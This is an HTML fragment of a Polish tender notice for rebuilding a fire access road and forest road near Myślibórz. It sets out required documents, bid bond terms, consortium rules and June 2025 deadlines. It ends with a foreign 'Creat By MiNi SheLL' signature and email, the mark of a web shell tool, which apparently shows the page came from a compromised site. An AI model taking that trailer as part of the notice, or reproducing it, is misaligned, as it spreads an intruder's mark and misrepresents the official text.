dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt<br/>5 PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi załącznik nr 6 do SWZ);<br/>b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub<br/>opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>c) zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłat tych należności;<br/>d) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>e) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (oświadczenie o braku podstaw do wykluczenia, sporządzone wg załącznika nr 3B do SWZ), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia<br/>zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c)<br/>art. 108 ust. 1 pkt 5 PZP, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji, d) art. 108 ust. 1 pkt 6<br/>PZP, e) art. 109 ust. 1 pkt 1 PZP, odnośnie naruszenia obowiązków dotyczących<br/>płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia<br/>1991 r. o podatkach i opłatach lokalnych, f) art. 109 ust. 1 pkt 8 i 10 PZP, - (wzór<br/>oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z<br/>postępowania stanowi załącznik nr 9 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w<br/>pkt 7.1. Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących<br/>podmiotowych środków dowodowych:<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność<br/>kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej<br/>złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, o których mowa w pkt 9.2.<br/>lit. a) SWZ, Wykonawca składa inne podmiotowe środki dowodowe, które w<br/>wystarczający sposób potwierdzają spełnianie opisanego przez Zamawiającego<br/>warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub<br/>finansowej.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane (wzór wykazu wykonanych robót<br/>budowlanych stanowi załącznik nr 7 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych<br/>wykonywanych wspólnie z innymi Wykonawcami wykaz, o którym mowa wyżej<br/>dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio<br/>uczestniczył.<br/>Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia, w którym<br/>upływa termin składnia ofert.<br/>c) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na<br/>potwierdzenie spełnienia warunku udziału w postępowaniu dot. zdolności<br/>technicznej lub zawodowej w zakresie doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa wyżej, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>d) wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień (numer oraz<br/>zakres uprawnień zapewniających prawo wykonywania samodzielnych funkcji<br/>technicznych w budownictwie, z podaniem daty i pełnej podstawy prawnej ich<br/>wydania) niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami (wzór wykazu osób skierowanych przez wykonawcę<br/>do realizacji zamówienia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie składania ofert określonym w pkt 14.1. SWZ Wykonawca zobowiązany jest<br/>złożyć Zamawiającemu Ofertę zawierającą:<br/>a) formularz Oferty sporządzony wg wzoru stanowiącego zał. nr 1 do SWZ pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym,<br/>b) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio zał. nr 3A i zał. 3B do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu<br/>składającego oświadczenie, złożone przez:<br/>- Wykonawcę,<br/>- Wykonawców wspólnie ubiegających się o udzielenie zamówienia (o ile wykonawcy wspólnie ubiegają się o udzielenie zamówienia);<br/>c) oświadczenia, sporządzone zgodnie ze wzorami stanowiącymi odpowiednio zał. nr 3C i zał. 3D do SWZ, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby/osób upoważnionych do reprezentacji podmiotu<br/>udostępniającego Wykonawcy zasoby na zasadzie określonej w art. 118 PZP, o ile dotyczy,<br/>d) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów zgodnie z<br/>pkt 9.4. SWZ, jeżeli Wykonawca wykazując spełnienie warunków udziału w<br/>postępowaniu polega na zdolnościach lub sytuacji innych podmiotów; (Niewiążący<br/>wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby wykonania zamówienia stanowi zał. nr 5 do SWZ),<br/>e) odpis lub informacja z KRS, CEiIDG lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, jest umocowana do jego reprezentowania. W-ca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane umożliwiające dostęp do tych dokumentów,<br/>f) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy/podmiotu udostępniającego zasoby na zasadach określonych w art. 118 PZP, jeżeli w imieniu Wykonawcy/podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z innych dokumentów złożonych wraz z ofertą (np. odpisu lub informacji<br/>z KRS, CEiIDG lub innego właściwego rejestru), sporządzone pod rygorem nieważności w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub w formie opisanej w pkt 9.17-9.21 SWZ,<br/>g) pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzonej się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub w formie opisanej w pkt 9.17-9.21 SWZ,<br/>h) podmiotowy środek dowodowy w postaci oświadczenia, o którym mowa w art. 117 ust. 4 PZP – z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia. (Zamawiający rekomenduje wykorzystać oświadczenie znajdujące się w treści formularza Oferty stanowiącego zał. nr 1 do SWZ).<br/>i) wadium w oryginale w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia (tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości: 9 990,00 zł (słownie złotych:<br/>dziewięć tysięcy dziewięćset dziewięćdziesiąt 00/100 PLN).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o<br/>których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/> Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2023 r., poz. 462). Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w banku BNP Paribas Bank Polska SA Oddział w Myśliborzu nr<br/>rachunku: 13 2030 0045 1110 0000 0126 4460 z dopiskiem: „wadium na<br/>zabezpieczenie oferty w postępowaniu pn. „Przebudowa dojazdu pożarowego nr 9 i<br/>drogi leśnej na terenie leśnictwa Chłopiny i Smoliny – etap VI (km 0+000,00 – km<br/>0+950,00)”. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym<br/>terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wniesione<br/>w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej<br/>lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie<br/>zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie<br/>gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach<br/>określonych w art. 98 ust. 6 PZP.<br/>11.5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 11.2. ppkt<br/>2)-4) należy przekazać Zamawiającemu wraz z Ofertą w oryginale w postaci<br/>elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi osób<br/>upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę przez cały<br/>okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium<br/>w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu<br/>terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym<br/>mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226<br/>ust. 1 pkt 14 PZP w zw. z art. 266 PZP. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia<br/>(Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających<br/>gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem –<br/>określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i<br/>nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie<br/>Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): 1)w formularzu oferty<br/>należy wskazać firmy (nazwy) wszystkich W-ców wspólnie ubiegających się o udzielenie zamówienia;<br/>2)oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich W-ców wspólnie ubiegających się o udzielenie<br/>zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z<br/>treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres umocowania;<br/>3)Oświadcz.,o których mowa w art. 125 ust. 1 PZP, tj. oświadcz. o speł. war. udziału w postęp.(wg wzoru stanowiącego zał.<br/>nr 3A do SWZ) oraz oświadcz. o braku podst.do wykl.(wg wzoru stanowiącego zał.nr 3B do SWZ) składa każdy z<br/>wykonawców. Oświadcz.te potwierdzają brak pods.wyklucz.oraz spełn. war.udziału w postęp.w zakresie, w jakim każdy z wców<br/>wykazuje<br/>spełn.war.udziału w postęp.Oświadcz. w-ców wspólnie ubiegających się o udzielenie zamówienia, o których mowa wyżej<br/>powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektr. lub w postaci elektr.opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.4)dokumenty, o których mowa w pkt 9.3. obowiązany będzie złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>5)wszyscy W-cy wspólnie ubiegający się o udzielenie zamów.będą ponosić odpowiedzialność solidarną za wykonanie<br/>umowy;<br/>6)W-cy wspólnie ubiegający się o udzielenie zamów.wyznaczą spośród siebie W-cę kierującego (lidera), upoważnionego do<br/>zaciągania zobow.,otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich partnerów;<br/>7)Z-cy może w ramach odpow. solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich W-ców wspólnie<br/>ubiegających się o udzielenie zamów.łącznie lub każdego z osobna.<br/>8)Z-cy informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków<br/>dot.wykształcenia, kwalifikacji zawod. lub doświadcz. w-cy wspólnie ubiegający się o udzielenie zamów.mogą polegać na<br/>zdoln.tych z w-ców, którzy wykonają rob.bud., do realizacji których te zdolności są wymagane. W związku z powyższym<br/>Wca jest zobow.załączyć do oferty podm.śr.dow.w postaci oświadcz.,z którego wynika, które roboty bud.wykonają<br/>poszczególni W-cy. Wzór stosownego oświadcz.został zawarty w formularzu Oferty stanowiącym zał.nr 2 do SWZ i Z-cy<br/>zaleca złożyć to oświadcz.właśnie w tym formularzu. W przypadku W-ców wykonujących działalność w formie spółki cywilnej<br/>postanowienia dot. oferty W-ców wspólnie ubiegających się o udzielenie zamów.(konsorcjum) stosuje się odpowiednio, z zastrzeżeniem,że do odpowiedzi na wezwanie Z-cego do złożenia dokumentów, o którym mowa w pkt 9.3. należy załączyć<br/>(1) zaświad.właściwego naczelnika US potw.,że W-ca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1<br/>pkt 1) PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem<br/>podatków lub opłat wraz z zaświad.,Z-cy żąda złożenia dokumentów potwierdzające, że przed upływem terminu składania<br/>ofert W-ca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należn.,oraz (2) zaświad. albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej ZUS lub właściwego oddziału region.lub właściwej placówki terenowej KRUS potw., że W-ca nie zalega z<br/>opłacaniem składek na ubezp. społ. lub zdrow., w zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż<br/>3miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem składek na ubezp. społ. lub zdrow. wraz z zaśw.<br/>albo innym dokumentem Z-cy żąda złożenia dokumentów potw.,że przed upływem terminu składania ofert W-ca dokonał<br/>płatności należnych składek na ubezp. społ. lub zdrow. wraz z odsetkami lub grzywnami lub zawarł wiążące poroz.w<br/>sprawie spłat tych należn.-odrębnie dla każdego ze wspólników oraz odrębnie dla spółki <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Z-cy na podstawie art 455 ust. 1 pkt 1 PZP, przewiduje możliwość dokonania następujących zmian Umowy:(1)w zakresie<br/>zmiany terminów realizacji poszczególnych robót określonych w Harmonogramie oraz Terminu Wykonania;(2)w zakresie<br/>zmiany kolejności wykonywania lub zmiany terminów wykonania poszczególnych świadczeń wchodzących w skład<br/>Przedmiotu Umowy w stosunku do kolejności i terminów określonych w Harmonogramie jednakże bez dokonywania zmiany<br/>Terminu Wykonania. Przedmiotowa zmiana będzie mogła być wprowadzona w szczególności w przypadku zaistnienia<br/>okoliczności wskazanych w pkt (1).(3)w zakresie zmiany sposobu wykonania Przedmiotu Umowy związanej z koniecznością<br/>zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych;(4)W zakresie<br/>zmiany Wynagrodzenia, w przypadku, gdy zmiany, o których mowa w pkt (3) będą miały wpływ na koszty wykonania<br/>Przedmiotu Umowy przez Wykonawcę. Inicjatorem zmian w Umowie może być każda ze Stron, z tym, że ostateczna<br/>decyzja, co do wprowadzenia zmian i ich zakresu należy do Zamawiającego. Wystąpienie którejkolwiek z okoliczności<br/>mogących powodować zmianę umowy, nie stanowi bezwzględnego zobowiązania Zamawiającego do dokonania zmian, ani<br/>nie może stanowić podstawy do jakichkolwiek roszczeń Wykonawcy do ich dokonania.3.Niezależnie od postanowień<br/>niniejszego paragrafu, Strony dopuszczają możliwość (i) zmian redakcyjnych Umowy oraz (ii) zmian danych Stron<br/>ujawnionych w rejestrach publicznych, nie stanowiących zmiany, o której mowa w art. 455 ust. 1 PZP. Pełen i szczegółowy opis zawiera SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy (e-Zamówienia)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-23 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB(wielkość ta<br/>dotyczy plików przesyłanych jako załącznik do jednego formularza). We wszelkiej korespondencji związanej z niniejszym<br/>postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w SWZ. Jeżeli<br/>przekazywane dokumenty zawierają tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r.<br/>o zwalczaniu nieuczciwej konkurencji(tekst jedn.Dz.U. z 2022 r. poz. 1233)Wykonawca, w celu utrzymania w poufności tych<br/>informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku wraz z jednoczesnym zaznaczeniem w nazwie<br/>pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.Informacje na temat komunikacji za pośrednictwem Platformy<br/>dostępne są również w Instrukcji interaktywnej–Komunikacja w postępowaniu dostępnej pod adresem:<br/>https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf.<br/>Pełen i szczegółowy opis warunków zamówienia zawiera SWZ dostępny na stronie<br/>https://ezamowienia.gov.pl/mpclient/search/list/ocds-148610-e5c546a7-0d04-4047-92be-ab4ab71360c4

Creat By MiNi SheLL
Email: jattceo@gmail.com